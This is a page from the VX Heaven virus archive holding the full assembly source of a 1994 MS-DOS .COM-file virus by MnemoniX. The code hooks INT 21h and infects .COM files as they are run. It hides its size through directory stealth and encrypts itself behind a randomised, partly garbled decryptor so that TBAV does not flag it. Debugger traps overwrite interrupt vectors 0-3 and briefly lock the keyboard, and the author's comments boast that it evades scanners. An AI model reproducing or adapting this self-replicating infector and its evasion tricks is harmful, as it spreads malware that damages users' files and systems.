VX Heaven

Library Collection Sources Engines Constructors Simulators Utilities Links Forum

Source code of computer viruses


Virus for MS-DOS

Show all viruses by this author

Description and download



[Turn off syntax highlighting]
; =======================================================================>
;  100% By MnemoniX - 1994
;  This is a memory resident .COM infector which hides itself using
;  directory stealth (11/12 and 4E/4F). To avoid setting heuristic
;  flags in TBAV, it overwrites part of the decryption routine with
;  garbage and adds instructions to repair it on the header of the
;  program. Runs through TBAV flawlessly. Examine it in action and
;  observe for yourself.
;  This virus also includes debugger traps to thwart tracing.
; =======================================================================>
PING            equ     30F4h                   ; give INT 21 this value ...
PONG            equ     0DEADh                  ; if this returns we're res.
ID              equ     '%0'                    ; ID marker
HEADER_SIZE     equ     22                      ; 22 - byte .COM header
MARKER          equ     20                      ; marker at offset 20
code            segment byte    public  'code'
                org     100h
                assume  cs:code
                db      17 dup (90h)            ; simulate infected program
                jmp     virus_begin             ; a real host program will
                dw      ID                      ; have some MOVs at the
                db      0CDh,20h                ; beginning
                db      20 dup(90h)
                db      0BBh                    ; mov bx,offset viral_code
code_offset     dw      offset virus_code
                db      0B8h                    ; mov ax,cipher
cipher          dw      0
                mov     cx,VIRUS_SIZE / 2 + 1   ; mov cx,length of code
                xor     [bx],ax                 ; in real infections,
                ror     ax,1                    ; portions of this code
                inc     bx                      ; will be replaced with
                inc     bx                      ; dummy bytes, which will be
                loop    decrypt                 ; fixed up by the header.
                                                ; this complicates scanning
                call    $+3                     ; BP is instruction pointer
                pop     bp
                sub     bp,offset $-1
                xor     ax,ax                   ; anti-trace ...
                mov     es,ax                   ; set interrupts 0-3 to point
                mov     di,ax                   ; to The Great Void in high
                dec     ax                      ; memory ...
                mov     cl,8
                rep     movsw
                mov     ax,PING                 ; test for residency
                int     21h
                cmp     bx,PONG
                je      installed
                in      al,21h                  ; another anti-debugger
                xor     al,2                    ; routine ... lock out
                out     21h,al                  ; keyboard
                xor     al,2
                out     21h,al
                mov     ax,ds                   ; not resident - install
                dec     ax                      ; ourselves in memory
                mov     ds,ax
                sub     word ptr ds:[3],(MEM_SIZE + 15) / 16 + 1
                sub     word ptr ds:[12h],(MEM_SIZE + 15) / 16 + 1
                mov     ax,ds:[12h]
                mov     ds,ax
                sub     ax,15
                mov     es,ax
                mov     byte ptr ds:[0],'Z'
                mov     word ptr ds:[1],8
                mov     word ptr ds:[3],(MEM_SIZE + 15) / 16
                push    cs                      ; now move virus into memory
                pop     ds
                mov     di,100h
                mov     cx,(offset virus_end - offset start) / 2
                lea     si,[bp + offset start]
                rep     movsw
                xor     ax,ax                   ; change interrupt 21 to point
                mov     ds,ax                   ; to ourselves
                mov     si,21h * 4
                mov     di,offset old_int_21    ; (saving original int 21)
                mov     word ptr ds:[si - 2],0  ; anti-trace - temporarily
                                                ; kill int 21
                mov     ds:[si - 4],offset new_int_21
                mov     ds:[si - 2],es
                push    cs                      ; restore segregs
                push    cs
                pop     ds
                pop     es
                lea     si,[bp + offset host]   ; and restore original
                mov     di,100h                 ; bytes of program
                push    di
                mov     cx,HEADER_SIZE
                rep     movsb
                ret                             ; and we're done
; Interrupt 21 handler - trap file execute, search, open, read, and
; moves to the end of the file.
                call    dword ptr cs:[old_int_21]
                cmp     ax,30F4h                ; residency test?
                je      test_pass               ; yes ....
                cmp     ax,4B00h                ; file execute?
                jne     stealth
                jmp     execute                 ; yes, infect ...
                cmp     ah,11h                  ; directory stealth
                je      dir_stealth_1
                cmp     ah,12h
                je      dir_stealth_1
                cmp     ah,4Eh                  ; more directory stealth
                je      dir_stealth_2
                cmp     ah,4Fh
                je      dir_stealth_2
                db      0EAh                    ; never mind ...
old_int_21      dd      0
                call    int_21                  ; get real DOS version
                mov     bx,PONG                 ; and give pass signal
                call    int_21                  ; perform directory search
                cmp     al,-1                   ; no more files?
                jne     check_file
                iret                            ; no, skip it
                push    ax bx es                ; check file for infection
                mov     ah,2Fh
                int     21h
                cmp     byte ptr es:[bx],-1     ; check for extended FCB
                jne     no_ext_FCB
                add     bx,7
                cmp     word ptr es:[bx + 9],'OC'
                jne     fixed                   ; not .COM file, ignore
                mov     ax,word ptr es:[bx + 17h]
                and     al,31                   ; check seconds -
                cmp     al,26                   ; if 52, infected
                jne     fixed
                sub     word ptr es:[bx + 1Dh],VIRUS_SIZE + HEADER_SIZE
                sbb     word ptr es:[bx + 1Fh],0
                pop     es bx ax
                call    int_21                  ; perform file search
                jnc     check_file_2            ; if found, proceed
                retf    2                       ; nope, leave
                push    ax bx si es
                mov     ah,2Fh                  ; find DTA
                int     21h
                xor     si,si                   ; verify that this is a .COM
                cmp     byte ptr es:[bx + si],'.'
                je      found_ext
                inc     si
                jmp     find_ext
                cmp     word ptr es:[bx + si + 1],'OC'
                jne     fixed_2                 ; if not .COM, skip
                mov     ax,word ptr es:[bx + 16h]
                and     al,31                   ; check for infection marker
                cmp     al,26
                jne     fixed_2                 ; not found, skip
                sub     word ptr es:[bx + 1Ah],VIRUS_SIZE + HEADER_SIZE
                sbb     word ptr es:[bx + 1Ch],0
                pop     es si bx ax             ; done
                retf    2
                push    ax bx cx dx di ds es    ; file execute ... check
                                                ; if uninfected .COM file,
                mov     ax,3D00h                ; and if so, infect
                call    int_21
                jnc     read_header
                jmp     exec_exit               ; can't open, leave
                xchg    ax,bx
                push    bx                      ; save file handle
                mov     ax,1220h                ; get system file table
                int     2Fh                     ; entry
                nop                             ; remove this if you don't
                                                ; mind scanning as [512] under
                                                ; SCAN ...
                mov     bl,es:[di]              ; get number of the SFT
                mov     ax,1216h                ; for this handle
                int     2Fh                     ; ES:DI now points to SFT
                pop     bx
                mov     word ptr es:[di + 2],2  ; change open mode to R/W
                push    word ptr es:[di + 13]   ; save file date
                push    word ptr es:[di + 15]   ; and file time
                mov     ax,word ptr es:[di + 11h]
                cmp     ax,62579 - VIRUS_SIZE   ; too big?
                je      exec_close
                cmp     ax,22                   ; too small?
                jb      exec_close
                add     ax,HEADER_SIZE - 3      ; calculate virus offset
                push    cs
                pop     ds
                mov     ds:virus_offset,ax
                mov     ah,3Fh                  ; read header of file
                mov     cx,HEADER_SIZE          ; to check for infection
                mov     dx,offset read_buffer
                call    int_21
                cmp     word ptr ds:read_buffer,'ZM'
                je      exec_close              ; don't infect .EXE
                cmp     word ptr ds:read_buffer[MARKER],ID  ; if infected
                je      exec_close              ; already, skip it
                mov     ax,4202h                ; move to end of file
                call    move_ptr_write
                mov     dx,offset read_buffer   ; and save header
                call    int_21
                call    encrypt_code            ; encrypt the virus code
                call    create_header           ; and create unique header
                mov     ah,40h
                mov     cx,VIRUS_SIZE           ; write virus code to file
                mov     dx,offset encrypt_buffer
                int     21h
                mov     ax,4200h                ; back to beginning of file
                call    move_ptr_write
                mov     dx,offset new_header    ; write new header
                call    int_21
                pop     dx                      ; restore file date & time
                pop     cx
                and     cl,0E0h                 ; but with timestamp
                or      cl,26
                mov     ax,5701h
                int     21h
                mov     ah,3Eh                  ; close file
                int     21h
                pop     es ds di dx cx bx ax
                jmp     int_21_exit
                cwd                             ; move file pointer
                xor     cx,cx
                int     21h
                mov     cx,HEADER_SIZE          ; and prepare for write 
                mov     ah,40h                  ; to file
                pop     ax ax                   ; clean off stack
                mov     ah,3Eh                  ; and close
                int     21h
                jmp     exec_exit
encrypt_code    proc    near
                push    si es
                push    cs
                pop     es
                xor     ah,ah                   ; get random no.
                int     1Ah                     ; and store in decryption
                mov     cipher,dx               ; module
                mov     ax,ds:virus_offset
                add     ax,DECRYPTOR_SIZE + 103h
                mov     code_offset,ax
                mov     si,offset virus_begin   ; first store header
                mov     di,offset encrypt_buffer
                mov     cx,DECRYPTOR_SIZE
                rep     movsb                   ; (unencryted)
                mov     cx,ENCRYPTED_SIZE / 2 + 1 ; now encrypt & store code
                lodsw                           ; simple encryption routine
                xor     ax,dx
                ror     dx,1
                loop    encrypt
                pop     es si
encrypt_code    endp
create_header   proc    near
                mov     ax,ds:virus_offset      ; fix up addresses in new
                add     ax,103h + (offset decrypt - offset virus_begin)
                mov     ds:mov_1,ax             ; header
                inc     ax
                inc     ax
                mov     ds:mov_2,ax
                xor     ah,ah                   ; fill in useless MOVs
                int     1Ah                     ; with random bytes
                mov     ds:mov_al,cl
                mov     ds:mov_ax,dx
                push    es cs
                pop     es
                mov     di,offset encrypt_buffer
                add     di,offset decrypt - offset virus_begin
                mov     ax,dx                   ; now fill decryption module
                neg     ax                      ; with some garbage
                rol     ax,1
                pop     es
                sub     word ptr ds:virus_offset,17 ; fix up JMP instruction
                ret                             ; done
create_header   endp
new_header      db      0C7h,06
mov_1           dw      00
                db      31h,07                  ; first MOV            6
                db      0B0h
mov_al          db      00                      ; a nothing MOV AL,    2
                db      0C7h,06
mov_2           dw      00
                db      0D1h,0C8h               ; second MOV           6
                db      0B8h
mov_ax          dw      00                      ; a nothing MOV AX,    3
                db      0E9h                    ; jump instruction     1
virus_offset    dw      0                       ; virus offset         2
                dw      ID                      ; ID marker            2
                                                ; total bytes =       22
sig             db      '[100%] By MnemoniX 1994',0
VIRUS_SIZE      equ     offset virus_end - offset virus_begin
read_buffer     dw      HEADER_SIZE dup (?)     ; storage for orig header
encrypt_buffer  dw      VIRUS_SIZE dup (?)      ; storage for encrypted virus
MEM_SIZE        equ     offset heap_end - offset start
DECRYPTOR_SIZE  equ     offset virus_code - offset virus_begin
ENCRYPTED_SIZE  equ     offset virus_end - offset virus_code
code            ends
                end     start
By accessing, viewing, downloading or otherwise using this content you agree to be bound by the Terms of Use! aka